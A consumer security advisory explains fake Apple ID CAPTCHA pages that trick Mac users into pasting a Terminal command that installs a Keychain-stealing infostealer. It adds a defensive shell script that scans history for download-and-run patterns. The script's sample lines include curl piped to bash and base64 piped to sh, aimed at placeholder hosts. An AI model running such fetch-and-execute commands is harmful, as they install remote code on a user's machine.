Fake Apple ID Verification CAPTCHA Malware Scam on macOS
Scam websites display fake Apple ID verification CAPTCHA prompts that instruct macOS users to open Terminal and paste a command to 'prove they are human', silently installing malware under the guise of Apple account verification.
Last reviewed: 8 June 2026
Apple's ecosystem has a strong reputation for security, which makes macOS users somewhat less vigilant about security prompts they encounter on the web. Criminals have engineered a specific attack that combines the Apple brand's authority with the now-widespread fake-CAPTCHA social engineering technique.
A malicious or compromised website presents a full-screen overlay branded with the Apple logo and styling from appleid.apple.com. It declares that the visitor's Apple ID needs to be verified to continue and presents step-by-step instructions that direct the user to open macOS Terminal, paste a command, and press Enter.
The command downloads and silently installs an infostealer targeting the macOS Keychain, which stores Apple ID credentials, Safari saved passwords, and other sensitive data, sending them to the attacker before the victim realises anything unusual has occurred.
How this scam works on the Apple brand
Apple's genuine Apple ID verification is handled entirely within the browser at appleid.apple.com or through device-native prompts such as Face ID, Touch ID, or a system dialog. Apple never directs users to open Terminal or execute command-line code as part of any authentication or verification process.
The fake overlay appears when a victim visits a compromised website or follows a redirect chain from a malicious ad. It closely mimics Apple's clean white interface and the familiar Apple ID padlock icon. The verification steps are presented in numbered format with official-looking instructional language, which reduces the appearance of risk.
Because macOS users have been conditioned to trust Apple's design language and to consider their platform more secure, they may comply with the Terminal instruction before questioning it. The malware targets Keychain data specifically because it contains credentials for every service the victim uses.
Common red flags
- A browser page claiming to be Apple ID verification asks you to open Terminal or run a command.
- Apple never asks users to open Terminal, paste commands, or execute scripts to verify their Apple ID.
- The page appears on a site that is not appleid.apple.com — check the address bar carefully.
- The overlay cannot be closed and fills the entire browser window.
- The verification steps reference copying something from your clipboard.
- The page appeared after clicking an ad or being redirected from an unrelated site.
How to protect yourself
- Never open Terminal or execute any command at the instruction of a website, regardless of the branding shown.
- Verify your Apple ID status directly at appleid.apple.com — never via a web overlay prompt.
- Enable macOS's built-in Gatekeeper at System Settings > Privacy & Security to block unverified software.
- If you ran the command, disconnect from the internet immediately, run Malwarebytes for Mac or a reputable security tool, and change your Apple ID password at appleid.apple.com.
- Review saved passwords and credentials in your macOS Keychain via the Keychain Access app and change any that may have been exposed.
- Enable two-factor authentication on your Apple ID at appleid.apple.com > Security if not already active.
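For anyone checking a Mac after such instructions were followed: the added example below (not part of the original article) scans shell history for lines with the download-and-run shape of the Terminal command described above. The patterns, function names and sample history lines are constructed assumptions; the article does not publish the actual command.

```sh
#!/bin/sh
# Added example, not from the article. The patterns are generic
# download-and-run shapes (assumptions), not indicators published on this page.

matches() { printf '%s\n' "$1" | grep -Eq -- "$2"; }

# reason_for CMD: print why CMD is suspicious; return 1 if it is not.
reason_for() {
  fetch='(curl|wget)[[:space:]]'
  pipe='[|][[:space:]]*'
  subst='[$][(]'
  # The interpreter name must end the word, so "| shasum" is not a hit.
  interp='(sudo[[:space:]]+)?(/[^[:space:]]*/)?(sh|bash|zsh|osascript|python3?|perl)([[:space:]]|$)'
  if matches "$1" "${fetch}.*${pipe}${interp}"; then
    echo 'download piped to interpreter'
  elif matches "$1" "(^|[^[:alnum:]_])(sh|bash|zsh)[[:space:]]+-c[[:space:]].*${subst}.*${fetch}"; then
    echo 'interpreter runs downloaded text'
  elif matches "$1" "base64[[:space:]]+(-d|-D|--decode).*${pipe}${interp}"; then
    echo 'decoded blob piped to interpreter'
  else
    return 1
  fi
}

# scan_history: read history lines on stdin, print "line<TAB>reason<TAB>command".
scan_history() {
  n=0
  # zsh EXTENDED_HISTORY prefixes entries with ": <epoch>:<secs>;" so strip it.
  sed -E 's/^: [0-9]+:[0-9]+;//' | while IFS= read -r line; do
    n=$((n + 1))
    if why=$(reason_for "$line"); then
      printf '%s\t%s\t%s\n' "$n" "$why" "$line"
    fi
  done
}

# Constructed sample history; hostnames use the reserved .invalid TLD.
sample_history() {
  cat <<'EOF'
: 1767225600:0;brew install jq
: 1767225660:0;curl -fsSL https://verify.example.invalid/a | bash
curl -fsSL https://example.invalid/tool.tgz | shasum -a 256
/bin/bash -c "$(curl -fsSL https://cdn.example.invalid/i.sh)"
echo CONSTRUCTED_PLACEHOLDER | base64 -D | sh
EOF
}

sample_history | scan_history   # real use: scan_history < ~/.zsh_history
```

A hit is a lead, not a verdict: legitimate installers use the same shapes, so each flagged line still needs to be read by hand.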
How to report it
- Report the malicious website to Apple at [email protected].
- Report the URL to Google Safe Browsing at safebrowsing.google.com/safebrowsing/report_phish/.
- Report to the FTC at ReportFraud.ftc.gov (US) or Action Fraud at actionfraud.police.uk (UK).
- Submit the malicious command or file to VirusTotal at virustotal.com.
Frequently asked questions
Does Apple ever ask users to run Terminal commands to verify their Apple ID?
Never. Apple ID verification is handled entirely through the browser at appleid.apple.com, device-native Face ID or Touch ID prompts, or in-app authentication flows. A prompt instructing you to open Terminal is always malicious.
What is the macOS Keychain and why do attackers want it?
The macOS Keychain is a secure storage system built into macOS that holds passwords, encryption keys, and certificates for websites, apps, and system services. If compromised, it gives an attacker access to credentials for every account the victim uses on that Mac.
I ran the command on my Mac. What should I do immediately?
Disconnect from the internet, then run a reputable macOS security scanner such as Malwarebytes for Mac. Change your Apple ID password at appleid.apple.com and review your Keychain for exposed credentials. Consider resetting the Mac to a known good state.